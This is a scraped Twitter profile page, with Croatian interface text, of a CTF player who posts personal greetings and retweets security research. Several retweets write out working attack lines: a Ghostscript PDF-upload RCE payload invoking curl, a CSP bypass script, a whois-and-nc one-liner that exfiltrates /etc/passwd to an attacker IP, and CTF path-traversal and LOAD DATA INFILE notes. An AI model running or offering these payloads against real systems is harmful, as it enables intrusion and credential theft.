YuHang Wu

@wupco1996

A member of CTF team Tea Deliverers.

Vrijeme pridruživanja: lipanj 2017.

Tweetovi

Blokirali ste korisnika/cu @wupco1996

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @wupco1996

  1. 25. sij

    新年快乐 简简单单过个年

    Poništi
  2. 21. sij
    Poništi
  3. 14. sij
    Poništi
  4. 31. pro 2019.

    祝大家新年快乐!

    Poništi
  5. proslijedio/la je Tweet
    27. pro 2019.

    Our presentation on VMware Virtual Machine Escape () is in process. Please watch it in room BORG or on

    Poništi
  6. proslijedio/la je Tweet
    17. pro 2019.
    Odgovor korisniku/ci

    help() is calling locale.setlocale() to set the locale to the terminal locale setlocale() recomputes string.uppercase/lowercase and string.letters. it does the last one wrong. I'll file a bug :)

    Poništi
  7. proslijedio/la je Tweet
    22. pro 2019.
    Poništi
  8. 15. pro 2019.
    Poništi
  9. proslijedio/la je Tweet
    13. pro 2019.

    I wrote a thing about JSC exploitation (including how to leak StructureID) and Safari sandbox escape.

    Poništi
  10. 7. pro 2019.
    Poništi
  11. 3. pro 2019.
    Poništi
  12. proslijedio/la je Tweet
    9. stu 2019.

    CVE-2019-1356 - Microsoft Edge (EdgeHTML) Local file disclosure + EoP write up

    Poništi
  13. proslijedio/la je Tweet
    7. stu 2019.

    RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl ) ) .putdeviceparams quit

    Prikaži ovu nit
    Poništi
  14. 6. stu 2019.

    Toefl is so hard for me.😟

    Poništi
  15. proslijedio/la je Tweet
    3. stu 2019.

    CSP Bypass, script-src 'self' data: <script ?/src="data:+,\u0061lert%281%29">/</script>

    Poništi
  16. proslijedio/la je Tweet
    30. lis 2019.
    Poništi
  17. proslijedio/la je Tweet
    27. lis 2019.

    Have limited ways to exfiltrate data? Use Whois! attacker: nc -l -v -p 53 | sed "s/ //g" | base64 -d victim: whois -h $attackerIP -p 53 cat /etc/passwd | base64

    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    27. lis 2019.

    Our members & did a small research in which they created a fuzzing tool that found new functions to bypass PHP disable_functions & can also tell how strong your disable_functions is. Full report: Tool:

    Poništi
  19. 13. lis 2019.

    : trigger Form validator error Exception by `a=<a>` GET / HTTP/1.1 Host: 52.197.162.211 Content-Length: 29 Content-Type: application/x-www-form-urlencoded Connection: close filename=../../FLAG.txt&a=<a>

    Prikaži ovu nit
    Poništi
  20. 13. lis 2019.

    GoGO PowerSQL: key&value overflow in .bss=> overwrite mysqlhost => ENV pollution($ENV['LOCALDOMAIN'])=>LOAD DATA INFILE '/FLAG'

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·